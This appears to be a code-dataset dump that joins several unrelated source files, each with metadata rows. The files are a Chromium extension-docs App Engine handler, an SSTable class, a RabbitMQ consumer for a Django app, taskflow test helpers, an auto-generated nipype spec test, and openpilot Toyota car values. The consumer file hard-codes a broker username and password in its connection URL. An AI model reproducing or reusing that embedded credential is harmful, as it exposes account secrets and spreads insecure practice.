<o:app appid="{8A69D345-D564-463C-AFF1-A69D9E530F96}" version="0.0.0.0" lang="">
<o:updatecheck tag="%s" installsource="ondemandcheckforupdates" />
</o:app>
</o:gupdate>
""" % channel.tag
      result = urlfetch.fetch(url="https://tools.google.com/service/update2",
                              payload=postdata,
                              method=urlfetch.POST,
                              headers={'Content-Type': 'application/x-www-form-urlencoded',
                                       'X-USER-IP': '72.1.1.1'})
      if result.status_code != 200:
        logging.error("urlfetch failed.")
        # TODO(nickbaum): what should we do when the urlfetch fails?
      # find branch in response
      match = re.search(r'<updatecheck Version="\d+\.\d+\.(\d+)\.\d+"', result.content)
      if match is None:
        logging.error("Version number not found: " + result.content)
        #TODO(nickbaum): should we fall back on trunk in this case?
      branch = match.group(1)
      # TODO(nickbaum): make cache time a constant
      if not memcache.add(channel.name, branch, DEFAULT_CACHE_TIME):
        logging.error("Memcache set failed.")
    return branch

  # TODO(nickbaum): is there a more elegant way to write this unit test?
  # I deliberately kept it dumb to avoid errors sneaking in, but it's so verbose...
  # TODO(nickbaum): should I break this up into multiple files?
  def unitTest(self):
    """Exercise getSrcUrl() against known paths, writing results as HTML."""
    self.response.out.write("Testing TRUNK<br/>")
    self.check("/trunk/", "http://src.chromium.org/viewvc/chrome/trunk/src/chrome/common/extensions/docs/index.html", Channel.TRUNK)
    self.check("/trunk/index.html", "http://src.chromium.org/viewvc/chrome/trunk/src/chrome/common/extensions/docs/index.html", Channel.TRUNK)
    self.check("/trunk/getstarted.html", "http://src.chromium.org/viewvc/chrome/trunk/src/chrome/common/extensions/docs/getstarted.html", Channel.TRUNK)

    self.response.out.write("<br/>Testing DEV<br/>")
    self.check("/dev/", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/common/extensions/docs/index.html", Channel.DEV)
    self.check("/dev/index.html", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/common/extensions/docs/index.html", Channel.DEV)
    self.check("/dev/getstarted.html", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/common/extensions/docs/getstarted.html", Channel.DEV)

    self.response.out.write("<br/>Testing BETA<br/>")
    self.check("/beta/", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/common/extensions/docs/index.html", Channel.BETA)
    self.check("/beta/index.html", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/common/extensions/docs/index.html", Channel.BETA)
    self.check("/beta/getstarted.html", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/common/extensions/docs/getstarted.html", Channel.BETA)

    self.response.out.write("<br/>Testing STABLE<br/>")
    self.check("/stable/", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/common/extensions/docs/index.html", Channel.STABLE)
    self.check("/stable/index.html", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/common/extensions/docs/index.html", Channel.STABLE)
    self.check("/stable/getstarted.html", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/common/extensions/docs/getstarted.html", Channel.STABLE)

    self.response.out.write("<br/>Testing jstemplate_compiled.js<br/>")
    self.check("/trunk/third_party/jstemplate/jstemplate_compiled.js", "http://src.chromium.org/viewvc/chrome/trunk/src/chrome/third_party/jstemplate/jstemplate_compiled.js", Channel.TRUNK)
    self.check("/dev/third_party/jstemplate/jstemplate_compiled.js", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/third_party/jstemplate/jstemplate_compiled.js", Channel.DEV)
    self.check("/beta/third_party/jstemplate/jstemplate_compiled.js", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/third_party/jstemplate/jstemplate_compiled.js", Channel.BETA)
    self.check("/stable/third_party/jstemplate/jstemplate_compiled.js", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/third_party/jstemplate/jstemplate_compiled.js", Channel.STABLE)

    self.response.out.write("<br/>Testing extension API JSON<br/>")
    self.check("/trunk/api/bookmarks.json", "http://src.chromium.org/viewvc/chrome/trunk/src/chrome/common/extensions/api/bookmarks.json", Channel.TRUNK)
    self.check("/dev/api/bookmarks.json", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/common/extensions/api/bookmarks.json", Channel.DEV)
    self.check("/beta/api/bookmarks.json", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/common/extensions/api/bookmarks.json", Channel.BETA)
    self.check("/stable/api/bookmarks.json", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/common/extensions/api/bookmarks.json", Channel.STABLE)
    self.check("/stable/api/experimental.browsingData.json", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/common/extensions/api/experimental.browsingData.json", Channel.STABLE)

    self.response.out.write("<br/>Testing favicon.ico<br/>")
    self.check("/trunk/favicon.ico", "http://src.chromium.org/favicon.ico", Channel.TRUNK)
    self.check("/dev/favicon.ico", "http://src.chromium.org/favicon.ico", Channel.DEV)
    self.check("/beta/favicon.ico", "http://src.chromium.org/favicon.ico", Channel.BETA)
    self.check("/stable/favicon.ico", "http://src.chromium.org/favicon.ico", Channel.STABLE)

    self.response.out.write("<br/>Testing DEFAULT<br/>")
    # Temporarily swap the default channel; restored at the end below.
    temp = Channel.DEFAULT
    Channel.DEFAULT = Channel.DEV
    self.check("/", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/common/extensions/docs/index.html", Channel.DEV)
    self.check("/index.html", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/common/extensions/docs/index.html", Channel.DEV)
    self.check("/getstarted.html", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/common/extensions/docs/getstarted.html", Channel.DEV)
    self.check("/third_party/jstemplate/jstemplate_compiled.js", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/third_party/jstemplate/jstemplate_compiled.js", Channel.DEV)
    self.check("/api/extension_api.json", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/common/extensions/api/extension_api.json", Channel.DEV)
    self.check("/css/ApiRefStyles.css", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/common/extensions/docs/css/ApiRefStyles.css", Channel.DEV)
    self.check("/favicon.ico", "http://src.chromium.org/favicon.ico", Channel.DEV)

    self.response.out.write("<br/>Testing DEFAULT (trunk)<br/>")
    Channel.DEFAULT = Channel.TRUNK
    self.check("/", "http://src.chromium.org/viewvc/chrome/trunk/src/chrome/common/extensions/docs/index.html", Channel.TRUNK)
    self.check("/index.html", "http://src.chromium.org/viewvc/chrome/trunk/src/chrome/common/extensions/docs/index.html", Channel.TRUNK)
    self.check("/getstarted.html", "http://src.chromium.org/viewvc/chrome/trunk/src/chrome/common/extensions/docs/getstarted.html", Channel.TRUNK)
    self.check("/third_party/jstemplate/jstemplate_compiled.js", "http://src.chromium.org/viewvc/chrome/trunk/src/chrome/third_party/jstemplate/jstemplate_compiled.js", Channel.TRUNK)
    self.check("/api/extension_api.json", "http://src.chromium.org/viewvc/chrome/trunk/src/chrome/common/extensions/api/extension_api.json", Channel.TRUNK)
    self.check("/css/ApiRefStyles.css", "http://src.chromium.org/viewvc/chrome/trunk/src/chrome/common/extensions/docs/css/ApiRefStyles.css", Channel.TRUNK)
    self.check("/favicon.ico", "http://src.chromium.org/favicon.ico", Channel.TRUNK)
    Channel.DEFAULT = temp
    return

  # utility function for my unit test
  # checks that getSrcUrl(path) returns the expected values
  # TODO(nickbaum): can this be replaced by assert or something similar?
  def check(self, path, expectedUrl, expectedChannel):
    """Write a pass/fail HTML line for one getSrcUrl() expectation."""
    actual = self.getSrcUrl(path)
    if (actual[0] != expectedUrl):
      self.response.out.write('<span style="color:#f00;">Failure:</span> path ' + path + " gave url " + actual[0] + "<br/>")
    elif (actual[1] != expectedChannel):
      self.response.out.write('<span style="color:#f00;">Failure:</span> path ' + path + " gave branch " + actual[1].name + "<br/>")
    else:
      self.response.out.write("Path " + path + ' <span style="color:#0f0;">OK</span><br/>')
    return
# WSGI routing: every path is handled by MainPage.
application = webapp.WSGIApplication([
  ('/.*', MainPage),
], debug=False)

def main():
  """App Engine entry point."""
  run_wsgi_app(application)

if __name__ == '__main__':
  main()
| 52.1777 | 197 | 0.678197 |
ace97f5e1a38eb3d9641bcb6a6c2b1f1b3126799 | 1,322 | py | Python | sstable.py | anarmanafov1/kvs | 07ef1d9dc6db64c7b24861bbadf6f556c88f1674 | [
"MIT"
] | null | null | null | sstable.py | anarmanafov1/kvs | 07ef1d9dc6db64c7b24861bbadf6f556c88f1674 | [
"MIT"
] | null | null | null | sstable.py | anarmanafov1/kvs | 07ef1d9dc6db64c7b24861bbadf6f556c88f1674 | [
"MIT"
] | null | null | null | from bloomfilter import BloomFilter
from binio import kv_reader, kv_writer
# Bloom filter sizing shared by every table: bit-array length and the number
# of hash functions applied per key.
BF_SIZE = 10000
BF_HASH_COUNT = 5
class SSTable:
    """A Sorted-String-Table (SSTable) persisted on disk.

    Each table keeps a bloom filter over its keys so lookups for absent
    keys can usually skip the disk scan entirely.
    """

    def __init__(self, path, bf=None):
        self.path = path
        self.bf = bf
        if not self.bf:
            # No filter handed in: rebuild it from the on-disk entries.
            self._sync()

    def _sync(self):
        """Rebuild the bloom filter by scanning every key in the file."""
        self.bf = BloomFilter(BF_SIZE, BF_HASH_COUNT)
        with kv_reader(self.path) as reader:
            while reader.has_next():
                self.bf.add(reader.read_key())
                reader.skip_value()

    @classmethod
    def create(cls, path, memtable):
        """Flush `memtable` to `path` and return the resulting table."""
        bloom = BloomFilter(BF_SIZE, BF_HASH_COUNT)
        with kv_writer(path) as writer:
            for key, value in memtable.entries():
                writer.write_entry(key, value)
                bloom.add(key)
        return cls(path, bloom)

    def search(self, search_key):
        """Return the value stored for `search_key`, or None when absent."""
        if not self.bf.exists(search_key):
            # Bloom filter says "definitely not here": skip the disk scan.
            return None
        with kv_reader(self.path) as reader:
            while reader.has_next():
                current = reader.read_key()
                if current > search_key:
                    # Keys are stored sorted, so the target cannot follow.
                    return None
                if current == search_key:
                    return reader.read_value()
                reader.skip_value()
        return None
| 28.12766 | 60 | 0.535552 |
ace97fb9966f44bf704312095af6cff30ce0af45 | 794 | py | Python | admin/consumer.py | EricGip/PythonMicroServices | f0d7df9a21f981af053faba922accb23cdee9c09 | [
"MIT"
] | null | null | null | admin/consumer.py | EricGip/PythonMicroServices | f0d7df9a21f981af053faba922accb23cdee9c09 | [
"MIT"
] | null | null | null | admin/consumer.py | EricGip/PythonMicroServices | f0d7df9a21f981af053faba922accb23cdee9c09 | [
"MIT"
] | null | null | null | import pika, json, os, django
# The settings module must be configured *before* django.setup() runs and
# before any ORM model is imported below.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "admin.settings")
django.setup()

from products.models import Product

# SECURITY NOTE(review): broker credentials are hard-coded in this URL and
# should be moved into configuration / a secret store.
params = pika.URLParameters("amqps://tmgmrdcf:qjgjxvX7aESgpI2NnzRRWeKrLgq9fLsB@shark.rmq.cloudamqp.com/tmgmrdcf")

connection = pika.BlockingConnection(params)
channel = connection.channel()
# Declaring the queue is idempotent; it is created only if missing.
channel.queue_declare(queue='admin')


def callback(ch, method, properties, body):
    """Increment the like counter of the product whose id arrives in `body`."""
    print("Received in admin")
    id = json.loads(body)
    print(id)
    product = Product.objects.get(id=id)
    product.likes = product.likes + 1
    product.save()
    print("Product likes increased")


# auto_ack=True: messages are acknowledged on delivery, so a crash inside
# callback() loses the message.
channel.basic_consume(queue="admin", on_message_callback=callback, auto_ack=True)

print("Consumption successful")
# start_consuming() blocks until the consumer is stopped; only then does the
# close() below run.
channel.start_consuming()
channel.close()
ace97fc1c37965251237533be49338c23a9fecad | 10,361 | py | Python | taskflow/test.py | JonasMie/taskflow | 942bb76d9cf69a87e7c78f0e231ce9b94e69bb37 | [
"Apache-2.0"
] | null | null | null | taskflow/test.py | JonasMie/taskflow | 942bb76d9cf69a87e7c78f0e231ce9b94e69bb37 | [
"Apache-2.0"
] | 1 | 2020-12-16T12:48:32.000Z | 2020-12-16T12:48:32.000Z | taskflow/test.py | jimbobhickville/taskflow | 6ea991ce94f5be46b7e4726b4c4f014e10407786 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (C) 2012 Yahoo! Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
import collections
import logging
import fixtures
import mock
from oslotest import base
import six
from testtools import compat
from testtools import matchers
from testtools import testcase
from taskflow import exceptions
from taskflow.tests import utils
from taskflow.utils import misc
class GreaterThanEqual(object):
    """Matches if the item is geq than the matchers reference object."""

    def __init__(self, source):
        self.source = source

    def match(self, other):
        # A match returns None; anything else is reported as a mismatch.
        if not (other >= self.source):
            return matchers.Mismatch("%s was not >= %s" % (other, self.source))
        return None
class FailureRegexpMatcher(object):
    """Matches if the failure was caused by the given exception and message.

    A match succeeds when some cause inside the failure is an instance of
    the expected exception class and its string form matches the given
    regular expression pattern.
    """

    def __init__(self, exc_class, pattern):
        self.exc_class = exc_class
        self.pattern = pattern

    def match(self, failure):
        for cause in failure:
            if cause.check(self.exc_class) is not None:
                # Delegate the message comparison to the regex matcher.
                regex_matcher = matchers.MatchesRegex(self.pattern)
                return regex_matcher.match(cause.exception_str)
        return matchers.Mismatch("The `%s` wasn't caused by the `%s`" %
                                 (failure, self.exc_class))
class ItemsEqual(object):
    """Matches the items in two sequences.

    Validates that the provided sequence has the same elements as the
    reference sequence, regardless of ordering.
    """

    def __init__(self, seq):
        self._seq = seq
        self._list = list(seq)

    def match(self, other):
        other_list = list(other)
        extra = misc.sequence_minus(other_list, self._list)
        missing = misc.sequence_minus(self._list, other_list)
        if not (extra or missing):
            return None
        msg = ("Sequences %s and %s do not have same items."
               % (self._seq, other))
        if missing:
            msg += " Extra items in first sequence: %s." % missing
        if extra:
            msg += " Extra items in second sequence: %s." % extra
        return matchers.Mismatch(msg)
class TestCase(base.BaseTestCase):
    """Test case base class for all taskflow unit tests."""

    def makeTmpDir(self):
        """Create a temporary directory removed automatically on test exit."""
        t_dir = self.useFixture(fixtures.TempDir())
        return t_dir.path

    def assertDictEqual(self, expected, check):
        """Assert two dicts are equal, with per-key mismatch reporting."""
        self.assertIsInstance(expected, dict,
                              'First argument is not a dictionary')
        self.assertIsInstance(check, dict,
                              'Second argument is not a dictionary')

        # Testtools seems to want equals objects instead of just keys?
        compare_dict = {}
        for k in list(six.iterkeys(expected)):
            if not isinstance(expected[k], matchers.Equals):
                compare_dict[k] = matchers.Equals(expected[k])
            else:
                compare_dict[k] = expected[k]
        self.assertThat(matchee=check,
                        matcher=matchers.MatchesDict(compare_dict))

    def assertRaisesAttrAccess(self, exc_class, obj, attr_name):
        """Assert that reading ``obj.attr_name`` raises ``exc_class``."""

        def access_func():
            getattr(obj, attr_name)

        self.assertRaises(exc_class, access_func)

    def assertRaisesRegex(self, exc_class, pattern, callable_obj,
                          *args, **kwargs):
        """Assert the callable raises ``exc_class`` whose message matches
        ``pattern``; return the caught exception for further inspection."""
        # TODO(harlowja): submit a pull/review request to testtools to add
        # this method to there codebase instead of having it exist in ours
        # since it really doesn't belong here.

        # Re-raises anything that is *not* of the expected class so
        # unrelated failures surface with their original traceback.
        class ReRaiseOtherTypes(object):
            def match(self, matchee):
                if not issubclass(matchee[0], exc_class):
                    compat.reraise(*matchee)

        # Records the raised exception instance so it can be returned.
        class CaptureMatchee(object):
            def match(self, matchee):
                self.matchee = matchee[1]

        capture = CaptureMatchee()
        matcher = matchers.Raises(matchers.MatchesAll(ReRaiseOtherTypes(),
                                  matchers.MatchesException(exc_class,
                                                            pattern),
                                  capture))
        our_callable = testcase.Nullary(callable_obj, *args, **kwargs)
        self.assertThat(our_callable, matcher)
        return capture.matchee

    def assertGreater(self, first, second):
        """Assert ``second > first``."""
        matcher = matchers.GreaterThan(first)
        self.assertThat(second, matcher)

    def assertGreaterEqual(self, first, second):
        """Assert ``second >= first``."""
        matcher = GreaterThanEqual(first)
        self.assertThat(second, matcher)

    def assertRegexpMatches(self, text, pattern):
        """Assert ``text`` matches the regular expression ``pattern``."""
        matcher = matchers.MatchesRegex(pattern)
        self.assertThat(text, matcher)

    def assertIsSuperAndSubsequence(self, super_seq, sub_seq, msg=None):
        """Assert ``sub_seq`` appears in order (not necessarily contiguously)
        within ``super_seq``."""
        super_seq = list(super_seq)
        sub_seq = list(sub_seq)
        current_tail = super_seq
        for sub_elem in sub_seq:
            try:
                super_index = current_tail.index(sub_elem)
            except ValueError:
                # element not found
                if msg is None:
                    msg = ("%r is not subsequence of %r: "
                           "element %r not found in tail %r"
                           % (sub_seq, super_seq, sub_elem, current_tail))
                self.fail(msg)
            else:
                # Continue searching only after the element just matched.
                current_tail = current_tail[super_index + 1:]

    def assertFailuresRegexp(self, exc_class, pattern, callable_obj, *args,
                             **kwargs):
        """Asserts the callable failed with the given exception and message."""
        try:
            with utils.wrap_all_failures():
                callable_obj(*args, **kwargs)
        except exceptions.WrappedFailure as e:
            self.assertThat(e, FailureRegexpMatcher(exc_class, pattern))

    def assertItemsEqual(self, seq1, seq2, msg=None):
        """Assert both sequences contain the same items, order-insensitively."""
        matcher = ItemsEqual(seq1)
        self.assertThat(seq2, matcher)
class MockTestCase(TestCase):
    """Test case that tracks every created mock on a single master mock.

    Attaching mocks to ``master_mock`` lets tests assert on the relative
    ordering of calls across several patched collaborators.
    """

    def setUp(self):
        super(MockTestCase, self).setUp()
        self.master_mock = mock.Mock(name='master_mock')

    def patch(self, target, autospec=True, **kwargs):
        """Patch target and attach it to the master mock."""
        # Bug fix: pop 'attach_as' *before* building the fixture.  It was
        # previously forwarded into mock.patch via **kwargs, which tries to
        # configure an 'attach_as' attribute on the mock (and fails under
        # autospec, where unknown attributes are rejected).
        attach_as = kwargs.pop('attach_as', None)
        f = self.useFixture(fixtures.MockPatch(target,
                                               autospec=autospec, **kwargs))
        mocked = f.mock
        if attach_as is not None:
            self.master_mock.attach_mock(mocked, attach_as)
        return mocked

    def patchClass(self, module, name, autospec=True, attach_as=None):
        """Patches a modules class.

        This will create a class instance mock (using the provided name to
        find the class in the module) and attach a mock class the master mock
        to be cleaned up on test exit.
        """
        if autospec:
            instance_mock = mock.Mock(spec_set=getattr(module, name))
        else:
            instance_mock = mock.Mock()

        f = self.useFixture(fixtures.MockPatchObject(module, name,
                                                     autospec=autospec))
        class_mock = f.mock
        # Constructing the patched class yields the prepared instance mock.
        class_mock.return_value = instance_mock

        if attach_as is None:
            attach_class_as = name
            attach_instance_as = name.lower()
        else:
            attach_class_as = attach_as + '_class'
            attach_instance_as = attach_as

        self.master_mock.attach_mock(class_mock, attach_class_as)
        self.master_mock.attach_mock(instance_mock, attach_instance_as)
        return class_mock, instance_mock

    def resetMasterMock(self):
        """Clear recorded calls on the master mock and its children."""
        self.master_mock.reset_mock()
class CapturingLoggingHandler(logging.Handler):
    """A handler that saves record contents for post-test analysis."""

    def __init__(self, level=logging.DEBUG):
        # Old-style base-class call kept for python 2.x compatibility.
        logging.Handler.__init__(self, level=level)
        self._records = []

    @property
    def counts(self):
        """Returns a dictionary with the number of records at each level."""
        self.acquire()
        try:
            tally = collections.defaultdict(int)
            for record in self._records:
                tally[record.levelno] += 1
            return tally
        finally:
            self.release()

    @property
    def messages(self):
        """Returns a dictionary with list of record messages at each level."""
        self.acquire()
        try:
            grouped = collections.defaultdict(list)
            for record in self._records:
                grouped[record.levelno].append(record.getMessage())
            return grouped
        finally:
            self.release()

    @property
    def exc_infos(self):
        """Returns a list of all the record exc_info tuples captured."""
        self.acquire()
        try:
            return [record.exc_info
                    for record in self._records if record.exc_info]
        finally:
            self.release()

    def emit(self, record):
        self.acquire()
        try:
            self._records.append(record)
        finally:
            self.release()

    def reset(self):
        """Resets *all* internally captured state."""
        self.acquire()
        try:
            self._records = []
        finally:
            self.release()

    def close(self):
        logging.Handler.close(self)
        self.reset()
| 34.082237 | 79 | 0.603127 |
ace97fc8f70b4eb93ae272c5575e89074715483c | 2,586 | py | Python | nipype/interfaces/camino/tests/test_auto_TrackDT.py | vferat/nipype | 536c57da150d157dcb5c121af43aaeab71cdbd5f | [
"Apache-2.0"
] | null | null | null | nipype/interfaces/camino/tests/test_auto_TrackDT.py | vferat/nipype | 536c57da150d157dcb5c121af43aaeab71cdbd5f | [
"Apache-2.0"
] | 2 | 2018-04-17T19:18:16.000Z | 2020-03-04T22:05:02.000Z | nipype/interfaces/camino/tests/test_auto_TrackDT.py | oesteban/nipype | c14f24eba1da08711bbb894e049ee858ed740096 | [
"Apache-2.0"
] | null | null | null | # AUTO-GENERATED by tools/checkspecs.py - DO NOT EDIT
from __future__ import unicode_literals
from ..dti import TrackDT
def test_TrackDT_inputs():
    # Auto-generated by tools/checkspecs.py: pins the trait metadata of
    # TrackDT's input spec to the values recorded below, so any change in
    # the interface definition is caught. Regenerate rather than hand-edit.
    input_map = dict(
        anisfile=dict(
            argstr='-anisfile %s',
            extensions=None,
        ),
        anisthresh=dict(argstr='-anisthresh %f', ),
        args=dict(argstr='%s', ),
        curveinterval=dict(
            argstr='-curveinterval %f',
            requires=['curvethresh'],
        ),
        curvethresh=dict(argstr='-curvethresh %f', ),
        data_dims=dict(
            argstr='-datadims %s',
            units='voxels',
        ),
        environ=dict(
            nohash=True,
            usedefault=True,
        ),
        gzip=dict(argstr='-gzip', ),
        in_file=dict(
            argstr='-inputfile %s',
            extensions=None,
            position=1,
        ),
        inputdatatype=dict(argstr='-inputdatatype %s', ),
        inputmodel=dict(
            argstr='-inputmodel %s',
            usedefault=True,
        ),
        interpolator=dict(argstr='-interpolator %s', ),
        ipthresh=dict(argstr='-ipthresh %f', ),
        maxcomponents=dict(
            argstr='-maxcomponents %d',
            units='NA',
        ),
        numpds=dict(
            argstr='-numpds %d',
            units='NA',
        ),
        out_file=dict(
            argstr='-outputfile %s',
            extensions=None,
            genfile=True,
            position=-1,
        ),
        output_root=dict(
            argstr='-outputroot %s',
            extensions=None,
            position=-1,
        ),
        outputtracts=dict(argstr='-outputtracts %s', ),
        seed_file=dict(
            argstr='-seedfile %s',
            extensions=None,
            position=2,
        ),
        stepsize=dict(
            argstr='-stepsize %f',
            requires=['tracker'],
        ),
        tracker=dict(
            argstr='-tracker %s',
            usedefault=True,
        ),
        voxel_dims=dict(
            argstr='-voxeldims %s',
            units='mm',
        ),
    )
    inputs = TrackDT.input_spec()
    # Every recorded (trait, metakey) pair must match the live spec exactly.
    for key, metadata in list(input_map.items()):
        for metakey, value in list(metadata.items()):
            assert getattr(inputs.traits()[key], metakey) == value
def test_TrackDT_outputs():
    # Auto-generated by tools/checkspecs.py: pins the metadata of TrackDT's
    # single output trait ('tracked'). Regenerate rather than hand-edit.
    output_map = dict(tracked=dict(extensions=None, ), )
    outputs = TrackDT.output_spec()
    for key, metadata in list(output_map.items()):
        for metakey, value in list(metadata.items()):
            assert getattr(outputs.traits()[key], metakey) == value
| 28.733333 | 67 | 0.509667 |
ace980a324bd4893c4e08070cacb443f4a3f1d67 | 72,900 | py | Python | selfdrive/car/toyota/values.py | osilverstein/openpilot | adcfa4dcc49c7da77ad35223a84dbe8961d375a7 | [
"MIT"
] | null | null | null | selfdrive/car/toyota/values.py | osilverstein/openpilot | adcfa4dcc49c7da77ad35223a84dbe8961d375a7 | [
"MIT"
] | null | null | null | selfdrive/car/toyota/values.py | osilverstein/openpilot | adcfa4dcc49c7da77ad35223a84dbe8961d375a7 | [
"MIT"
] | null | null | null | from collections import defaultdict
from enum import IntFlag
from cereal import car
from selfdrive.car import dbc_dict
from selfdrive.config import Conversions as CV
# Short alias for the ECU enum defined in the cereal car schema.
Ecu = car.CarParams.Ecu

# Speed thresholds, converted from mph to m/s via CV.MPH_TO_MS.
MIN_ACC_SPEED = 19. * CV.MPH_TO_MS
PEDAL_TRANSITION = 10. * CV.MPH_TO_MS
class CarControllerParams:
    """Static actuator limits used by the Toyota car controller."""
    ACCEL_MAX = 1.5  # m/s2, lower than allowed 2.0 m/s2 for tuning reasons
    ACCEL_MIN = -3.5  # m/s2
    STEER_MAX = 1500  # EPS torque command limit (unitless CAN counts)
    STEER_DELTA_UP = 10  # 1.5s time to peak torque
    STEER_DELTA_DOWN = 25  # always lower than 45 otherwise the Rav4 faults (Prius seems ok with 50)
    STEER_ERROR_MAX = 350  # max delta between torque cmd and torque motor
class ToyotaFlags(IntFlag):
    """Bit flags describing Toyota platform variants."""
    HYBRID = 1
class CAR:
    """String identifiers for the supported Toyota and Lexus platforms."""
    # Toyota
    ALPHARD_TSS2 = "TOYOTA ALPHARD 2020"
    AVALON = "TOYOTA AVALON 2016"
    AVALON_2019 = "TOYOTA AVALON 2019"
    AVALONH_2019 = "TOYOTA AVALON HYBRID 2019"
    AVALON_TSS2 = "TOYOTA AVALON 2022"
    CAMRY = "TOYOTA CAMRY 2018"
    CAMRYH = "TOYOTA CAMRY HYBRID 2018"
    CAMRY_TSS2 = "TOYOTA CAMRY 2021"  # TSS 2.5
    CAMRYH_TSS2 = "TOYOTA CAMRY HYBRID 2021"
    CHR = "TOYOTA C-HR 2018"
    CHRH = "TOYOTA C-HR HYBRID 2018"
    COROLLA = "TOYOTA COROLLA 2017"
    COROLLA_TSS2 = "TOYOTA COROLLA TSS2 2019"
    # LSS2 Lexus UX Hybrid is same as a TSS2 Corolla Hybrid
    COROLLAH_TSS2 = "TOYOTA COROLLA HYBRID TSS2 2019"
    HIGHLANDER = "TOYOTA HIGHLANDER 2017"
    HIGHLANDER_TSS2 = "TOYOTA HIGHLANDER 2020"
    HIGHLANDERH = "TOYOTA HIGHLANDER HYBRID 2018"
    HIGHLANDERH_TSS2 = "TOYOTA HIGHLANDER HYBRID 2020"
    PRIUS = "TOYOTA PRIUS 2017"
    PRIUS_V = "TOYOTA PRIUS v 2017"
    PRIUS_TSS2 = "TOYOTA PRIUS TSS2 2021"
    RAV4 = "TOYOTA RAV4 2017"
    RAV4H = "TOYOTA RAV4 HYBRID 2017"
    RAV4_TSS2 = "TOYOTA RAV4 2019"
    RAV4H_TSS2 = "TOYOTA RAV4 HYBRID 2019"
    MIRAI = "TOYOTA MIRAI 2021"  # TSS 2.5
    SIENNA = "TOYOTA SIENNA 2018"

    # Lexus
    LEXUS_CTH = "LEXUS CT HYBRID 2018"
    LEXUS_ESH = "LEXUS ES HYBRID 2018"
    LEXUS_ES_TSS2 = "LEXUS ES 2019"
    LEXUS_ESH_TSS2 = "LEXUS ES HYBRID 2019"
    LEXUS_IS = "LEXUS IS 2018"
    LEXUS_NX = "LEXUS NX 2018"
    LEXUS_NXH = "LEXUS NX HYBRID 2018"
    LEXUS_NX_TSS2 = "LEXUS NX 2020"
    LEXUS_RC = "LEXUS RC 2020"
    LEXUS_RX = "LEXUS RX 2016"
    LEXUS_RXH = "LEXUS RX HYBRID 2017"
    LEXUS_RX_TSS2 = "LEXUS RX 2020"
    LEXUS_RXH_TSS2 = "LEXUS RX HYBRID 2020"
# Fixed CAN messages keyed by address, presumably transmitted on behalf of a
# removed/bypassed DSU (Driving Support Unit) — confirm against the consumer
# of this table.
# Tuple format: (addr, cars, bus, 1/freq*100, vl)
#   addr: CAN message address
#   cars: tuple of CAR identifiers the entry applies to
#   bus:  CAN bus index to send on
#   1/freq*100: send period in units of 10 ms
#   vl:   raw payload bytes
STATIC_DSU_MSGS = [
  (0x128, (CAR.PRIUS, CAR.RAV4H, CAR.LEXUS_RXH, CAR.LEXUS_NXH, CAR.LEXUS_NX, CAR.RAV4, CAR.COROLLA, CAR.AVALON), 1,   3, b'\xf4\x01\x90\x83\x00\x37'),
  (0x128, (CAR.HIGHLANDER, CAR.HIGHLANDERH, CAR.SIENNA, CAR.LEXUS_CTH, CAR.LEXUS_ESH), 1,   3, b'\x03\x00\x20\x00\x00\x52'),
  (0x141, (CAR.PRIUS, CAR.RAV4H, CAR.LEXUS_RXH, CAR.LEXUS_NXH, CAR.LEXUS_NX, CAR.RAV4, CAR.COROLLA, CAR.HIGHLANDER, CAR.HIGHLANDERH, CAR.AVALON, CAR.SIENNA, CAR.LEXUS_CTH, CAR.LEXUS_ESH, CAR.LEXUS_RX, CAR.PRIUS_V), 1,   2, b'\x00\x00\x00\x46'),
  (0x160, (CAR.PRIUS, CAR.RAV4H, CAR.LEXUS_RXH, CAR.LEXUS_NXH, CAR.LEXUS_NX, CAR.RAV4, CAR.COROLLA, CAR.HIGHLANDER, CAR.HIGHLANDERH, CAR.AVALON, CAR.SIENNA, CAR.LEXUS_CTH, CAR.LEXUS_ESH, CAR.LEXUS_RX, CAR.PRIUS_V), 1,   7, b'\x00\x00\x08\x12\x01\x31\x9c\x51'),
  (0x161, (CAR.PRIUS, CAR.RAV4H, CAR.LEXUS_RXH, CAR.LEXUS_NXH, CAR.LEXUS_NX, CAR.RAV4, CAR.COROLLA, CAR.AVALON, CAR.LEXUS_RX, CAR.PRIUS_V), 1,   7, b'\x00\x1e\x00\x00\x00\x80\x07'),
  (0X161, (CAR.HIGHLANDERH, CAR.HIGHLANDER, CAR.SIENNA, CAR.LEXUS_CTH, CAR.LEXUS_ESH), 1,  7, b'\x00\x1e\x00\xd4\x00\x00\x5b'),
